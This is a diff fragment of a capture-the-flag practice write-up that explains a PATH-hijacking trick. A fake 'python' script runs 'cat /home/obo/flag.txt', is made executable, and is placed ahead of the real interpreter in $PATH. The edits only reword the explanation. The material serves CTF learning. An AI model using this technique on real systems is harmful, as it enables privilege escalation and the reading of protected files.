yoshi-1224/CTF-practices/Off_By_One.md

 #!bin/sh
 cat /home/obo/flag.txt
 ```
-Make this executable and modify the $PATH variable
+Make this executable and modify the $PATH variable as follows
 ```
 chmod +x python
 export PATH=/home_users/pico*****:$PATH
 ```
-We set the path as above because of the precedence - from left to right.
+We set the path as above because of the precedence - from left to right, in order to precede the actual python path.

 Also, in order to use the actual python command, we can call it as python2.
 So we just have to type in the command line
 ```